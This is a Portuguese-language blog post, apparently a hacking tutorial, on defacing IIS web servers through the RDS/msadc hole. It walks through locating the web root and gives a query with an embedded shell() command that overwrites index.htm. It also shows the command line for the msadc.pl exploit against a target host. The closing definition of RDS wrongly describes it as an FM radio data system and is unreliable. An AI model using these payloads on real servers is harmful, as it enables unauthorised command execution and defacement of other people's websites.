Bom exemplo, como faço? assim, www.servidor.com/idq.idq ou ida.ida ou idc.idc, bom ai vou ver o diretorio.. anoto num txt, agora só decobrir se é index ou default e qual a extensão, bom só testando.. www.servidor.com/index.extenções possiveis ; ou www.servidor.com/default.exetenções possiveis , bom qual entrar é o certo ai é só anotar, vamos supor que o diretorio é :
c:inetpubwwwrootindex.htm, ai depois de ter achado isso entra na tela do RDS, ou seja www.servidor.com/msadc/samples/adctest.asp, e vai aparecer a tela do RDS, agora apague tudo que tiver escrito no query e digite:
Select * from Products where ProductType='|shell("cmd /c echo (O QUE QUER QUE APAREÇA NO SEU HACKED) > c:InetPubwwwrootindex.htm")|'
Depois é só apertar RUN e pronto!, agora vamos se por que vc quer evitar tudo isso, é so pegar um exploit chamado msadc.pl e pronto.. vc usa assim:
perl msadc.pl -h www.servidor.com , se aparecer cmd , vc digita :
(O que quer escrever) < C:InetPubwwwrootindex.htm (enter) só isso amigos.. bom aproveito, para ver se o servidor tem o bug do RDS é testando com o msadc/samples/adctest.asp ou passando um scaneador de vulneralidades! (gosto do nessus pra linux),pega ele em www.nessus.org.
o que é rds:O Radio Data System, ou RDS é um sistema de transmissão de dados digitais usando emissores de radiodifusão em FM. O RDS permite visualizar várias informações sobre a estação de rádio sintonizada, como o nome da rádio, tipo de programação, etc. ...

0 comentários:
Postar um comentário